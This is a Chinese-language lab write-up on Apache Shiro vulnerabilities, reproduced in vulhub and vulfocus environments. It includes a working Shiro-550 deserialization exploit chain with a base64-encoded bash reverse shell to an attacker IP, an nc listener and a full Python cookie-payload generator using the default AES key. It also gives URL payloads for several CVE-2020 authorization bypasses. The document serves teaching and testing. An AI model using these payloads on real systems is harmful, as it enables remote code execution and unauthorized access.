Apache Shiro提供了认证、授权、加密和会话管理功能,将复杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实现此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用。
Shiro将目标集中于Shiro开发团队所称的“四大安全基石”-认证(Authentication)、授权(Authorization)、会话管理(Session Management)和加密(Cryptography):
对于任何一个应用程序,Shiro都可以提供全面的安全管理服务。并且相对于其他安全框架,Shiro要简单的多。
详细信息: 百度百科-shiro安全框架
详细漏洞信息请参考阿里云漏洞库,部分漏洞信息如下:
在请求包的Cookie中为 rememberMe字段赋任意值,收到返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段,说明目标有使用Shiro框架,可以进一步测试。
漏洞原理: Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。因此该漏洞的关键点就在于找到AES的加密秘钥。
又因为Shiro 1.2.4及之前的版本中,AES加密的密钥默认硬编码在代码里(SHIRO-550),因此对于漏洞利用也产生了更加直接的危害。同很多开源项目也使用了shiro,存在公用AES秘钥的情况,也增加了秘钥泄露的风险。
漏洞分析: 和天网安实验室知乎文章
打开复现环境(使用vulhub docker 搭建),是一个默认的登录框,输入信息,勾选 Remember me,提交,查看返回的数据包,set-Cookie字段存在remenberme=deleteme,熟悉该漏洞的肯定瞬间就乐了,这正是shiro存在反序列化漏洞的经典标志。
进行漏洞利用第一步,使用jackson编码反弹shell的命令。
d第二步:使用ysoserial中JRMP监听模块,监听6666端口。
执行命令:java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtSSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3LjEzMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'
第三步:使用nc监听攻击机上的7777端口: nc -lvvp 7777
第四步:使用shiro-exploit.py获取shiro的默认key (工具地址:https://github.com/insightglacier/Shiro_exploit)
第五步:使用shiro.py生成payload(需要自己改key,shiro.py代码如下:)
命令:shiro.py 192.168.17.132:6666
shiro.py:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print ("rememberMe={0}".format(payload.decode()))
第六步:登录后抓包,替换数据包中的cookie值为shiro.py生成的rememberMe。
反弹sehll成功。
漏洞简介: CVE-2020-1957,Spring Boot中使用Apache Shiro进行身份验证、权限控制时,可以精心构造恶意的URL,利用Apache Shiro和Spring Boot对URL的处理的差异化,可以绕过Apache Shiro对Spring Boot中的Servlet的权限控制,越权并实现未授权访问。
攻击payload: /xxxxx/..;/admin
权限绕过的基本原理: 传入的恶意访问路径/xxxxx/..;/admin,经过shiro校验处理时,会在;处进行截断,对/xxxxx/..路径进行权限校验,而该路径又恰好满足校验规则,从而检验成功后将传入的路径/xxxxx/..;/admin交给spring boot 的控制器进行解析,而spring boot的解析后的路径是访问/admin,从而返回/admin路径下的内容给攻击者,从而实现权限绕过。
**漏洞详细分析: **先知论坛“茜さす”的博客
启用vulhub的CVE-2020-1957的漏洞环境,访问admin路径,跳转到login页面,说明存在权限认证。
使用攻击payload /xxxxx/..;/admin 进行访问,成功绕过权限认证,范文到admin路径。
漏洞原理:
和CVE-2020-1957的shiro权限绕过类似,都是由于shiro和springBoot的验证机制差异化导致的。我们在访问一个被不需要鉴权就能访问的页面的时候,如果在后面加上;/一个需要权限的路径,在分号的地方会被shiro截断,从而绕过鉴权。
漏洞分析: 先知论坛 13yxd博客
此处偷个懒,使用CVE-2020-1957的环境进行复现。
我们找一个不需要鉴权的页面进行访问,比如根目录。在其后加上;,再加上一个需要鉴权的目录进行访问(/admin/)。访问结果如下,成功绕过鉴权访问到admin目录:
漏洞原理: Apache Shiro的CVE-2020-11989修补补丁依旧存在缺陷,由于shiro和spring在处理url中仍然存在差别,通过构造特殊的HTTP请求,可以再次绕过授权,访问未授权的信息。其关键点还是在于shiro对URI的处理与Spring对URI处理方式的不同。
此次漏洞的不同点在于,传入一个payload:/admin/%3bpage后,shiro是先url解码再去除;,而spring则相反,是先去除;再进行url解码。因此导致漏洞。
漏洞分析: 先知论坛ELPSYCONGROO的博客
访问漏洞环境(漏洞环境在 http://vulfocus.fofa.so),输入payload为: /admin/%3bxxxx,成功访问到受保护的页面。
CVE-2020-13933虽然是CVE-2020-11989的绕过,然而两者的绕过内容却不同。
11989针对于/admin/page,这种固定路由,shiro得到的地址为/,因此认为可以访问,Spring得到的地址为/admin/page,从而定位到未授权的页面
13933则是匹配非固定地址路由,比如/admin/{name},因为shiro得到的是/admin/,是个目录,默认是可以访问的,只是该目录下的资源需要验证,而Spring得到的是/admin/;page,如果也采取固定路由,则会因为找不到;page,从而返回404
漏洞原理:
和其他shiro权限绕过漏洞一样,其基本原因都是在于其鉴权机制和spring鉴权机制不一样,导致的权限绕过。其被绕过的原因在于,访问一个受限的目录,在其目录后面加上一个空格,成为受限目录/%20/这样的形式的时候,由于shiro在校验时,会删除字符串中的空格,导致匹配失败,该路径就不会进行鉴权。而spring在匹配是,匹配到的就是正常输入的路径 /受限目录/%20 ,就会按照正常逻辑进行响应,造成鉴权绕过。
漏洞分析: jweny的先知社区
漏洞环境: http://vulfocus.fofa.so/
按照payload,访问/admin/%20/,成功绕过鉴权访问到admin页面
